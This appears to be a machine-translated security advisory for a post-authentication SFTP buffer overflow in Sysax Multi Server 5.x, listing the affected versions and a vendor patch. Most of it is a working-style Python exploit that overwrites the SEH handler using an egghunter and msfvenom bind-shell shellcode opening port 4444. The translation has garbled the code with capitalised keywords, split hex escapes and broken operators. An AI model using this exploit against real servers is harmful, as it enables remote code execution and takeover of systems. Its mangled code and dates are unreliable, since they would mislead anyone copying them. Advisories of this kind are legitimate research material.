Sysax Multi Server SFTP Module Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Codeorigin Sysax Multi Server 5.52
Codeorigin Sysax Multi Server 5.50
Codeorigin Sysax Multi Server 5.25
Codeorigin Sysax Multi Server 4.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52191

Sysax Multi Server is an SSH2 and FTP Server on Windows.

The Sysax Multi Server has a buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code.

<* Source: Craig Freyman

Link: http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/python
######################################## ######################################## ##########################
# Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter)
# Author: Craig Freyman (@ cd1zz)
# Tested on: XP SP3 32bit
# Software Versions Tested: 5.53
# Date Discovered: Febrary 22,201 2
# Vendor Contacted: Febrary 23,201 2
# Vendor Response: February 27,201 2
# Vendor Fix: Version 5.55
# Notes: Offset based on home path length. This exploit works for C: \ aaaaaaaaaaaaaa
# Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html
######################################## ######################################## ##########################
Import paramiko, OS, sys
If len (sys. argv )! = 5:
Print "[+] Usage:./filename <Target
IP> <Port> <User> <Password>"
Sys. exit (1)
Host = sys. argv [1]
Port = int (sys. argv [2])
Username = sys. argv [3]
Password = sys. argv [4]
Transport = paramiko. Transport (host, port ))
Transport. connect (username = username, password = password)
Sftp = paramiko. SFTPClient. from_transport (transport)
# Msfvenom-p windows/shell_bind_tcp LPORT = 4444-B "\ x00"-e x86/shikata_ga_nai
Shell = ("DNWPDNWP"
"\ Xdb \ xd9 \ xba \ xf9 \ x77 \ x28 \ x1b \ xd9 \ x74 \ x24 \ xf4 \ x5e \ x29 \ xc9"
"\ Xb1 \ x56 \ x31 \ x56 \ x18 \ x83 \ xee \ xfc \ x03 \ x56 \ xed \ x95 \ xdd \ xe7"
"\ Xe5 \ xd3 \ x1e \ x18 \ xf5 \ x83 \ x97 \ xfd \ xc4 \ x91 \ xcc \ x76 \ x74 \ x26"
"\ X86 \ xdb \ x74 \ xcd \ xca \ xcf \ x0f \ xa3 \ xc2 \ xe0 \ xb8 \ x0e \ x35 \ xce"
"\ X39 \ xbf \ xf9 \ x9c \ xf9 \ xa1 \ x85 \ xde \ x2d \ x02 \ xb7 \ x10 \ x20 \ x43"
"\ Xf0 \ x4d \ xca \ x11 \ xa9 \ x1a \ x78 \ x86 \ xde \ x5f \ x40 \ xa7 \ x30 \ xd4"
"\ Xf8 \ xdf \ x35 \ x2b \ x8c \ x55 \ x37 \ x7c \ x3c \ xe1 \ x7f \ x64 \ x37 \ xad"
"\ X5f \ x95 \ x94 \ xad \ x9c \ xdc \ x91 \ x06 \ x56 \ xdf \ x73 \ x57 \ x97 \ xd1"
"\ Xbb \ x34 \ xa6 \ xdd \ x36 \ x44 \ xee \ xda \ xa8 \ x33 \ x04 \ x19 \ x55 \ x44"
"\ Xdf \ x63 \ x81 \ xc1 \ xc2 \ xc4 \ x42 \ x71 \ x27 \ xf4 \ x87 \ xe4 \ xac \ xfa"
"\ X6c \ x62 \ xea \ x1e \ x73 \ xa7 \ x80 \ x1b \ xf8 \ x46 \ x47 \ xaa \ xba \ x6c"
"\ X43 \ xf6 \ x19 \ x0c \ xd2 \ x52 \ xcc \ x31 \ x04 \ x3a \ xb1 \ x97 \ x4e \ xa9"
"\ Xa6 \ xae \ x0c \ xa6 \ x0b \ x9d \ xae \ x36 \ x03 \ x96 \ xdd \ x04 \ x8c \ x0c"
"\ X4a \ x25 \ x45 \ x8b \ x8d \ x4a \ x7c \ x6b \ x01 \ xb5 \ x7e \ x8c \ x0b \ x72"
"\ X2a \ xdc \ x23 \ x53 \ x52 \ xb7 \ xb3 \ x5c \ x87 \ x18 \ xe4 \ xf2 \ x77 \ xd9"
"\ X54 \ xb3 \ x27 \ xb1 \ xbe \ x3c \ x18 \ xa1 \ xc0 \ x96 \ x2f \ xe5 \ x0e \ xc2"
"\ X7c \ x82 \ x72 \ xf4 \ x93 \ x0e \ xfa \ x12 \ xf9 \ xbe \ xaa \ x8d \ x95 \ x7c"
"\ X89 \ x05 \ x02 \ x7e \ xfb \ x39 \ x9b \ xe8 \ xb3 \ x57 \ x1b \ x16 \ x44 \ x72"
"\ X08 \ xbb \ xec \ x15 \ xda \ xd7 \ x28 \ x07 \ xdd \ xfd \ x18 \ x4e \ xe6 \ x96"
"\ Xd3 \ x3e \ xa5 \ x07 \ xe3 \ x6a \ x5d \ xab \ x76 \ xf1 \ x9d \ xa2 \ x6a \ xae"
"\ Xca \ xe3 \ x5d \ xa7 \ x9e \ x19 \ xc7 \ x11 \ xbc \ xe3 \ x91 \ x5a \ x04 \ x38"
"\ X62 \ x64 \ x85 \ xcd \ xde \ x42 \ x95 \ x0b \ xde \ xce \ xc1 \ xc3 \ x89 \ x98"
"\ Xbf \ xa5 \ x63 \ x6b \ x69 \ x7c \ xdf \ x25 \ xfd \ xf9 \ x13 \ xf6 \ x7b \ x06"
"\ X7e \ x80 \ x63 \ xb7 \ xd7 \ xd5 \ x9c \ x78 \ xb0 \ xd1 \ xe5 \ x64 \ x20 \ x1d"
"\ X3c \ x2d \ x50 \ x54 \ x1c \ x04 \ xf9 \ x31 \ xf5 \ x14 \ x64 \ xc2 \ x20 \ x5a"
"\ X91 \ x41 \ xc0 \ x23 \ x66 \ x59 \ xa1 \ x26 \ x22 \ xdd \ x5a \ x5b \ x3b \ x88"
"\ X5c \ xc8 \ x3c \ x99 ")
Egghunter = (
"\ X66 \ x81 \ xca \ xff \ x0f \ x42 \ x52 \ x6a \ x02 \ x58 \ xcd"
"\ X2e \ x3c \ x05 \ x5a \ x74 \ xef \ xb8 \ x44 \ x4e \ x57 \ x50"
"\ X8b \ xfa \ xaf \ x75 \ xea \ xaf \ x75 \ xe7 \ xff \ xe7 ")
Nseh = "\ x90 \ x90 \ xeb \ x08"
Junk = "A" * 256
Padding = "B" * (256-len (junk)-len (shell ))
Seh = "\ xA1 \ x47 \ x92 \ x5D" #5D9247A1 PPR RPCNS4.dll: *** SafeSEH unprotected ***
Remotepath = junk + nseh + seh + "\ x90" x 10 + egghunter + "\ x90" * 1000 + shell + "\ x90" * 100
Localpath = '/tmp/system. Log'
Print "============================================ ============================================"
Print "Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter )"
Print "by cd1zz"
Print "www.pwnag3.com"
Print "Launching exploit against" + host + "on port" + str (port) + "for XP"
Print "============================================ ============================================"
Sftp. get (remotepath, localpath)
Sftp. close ()
Transport. close ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Codeorigin
----------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.ftpshell.com/index.htm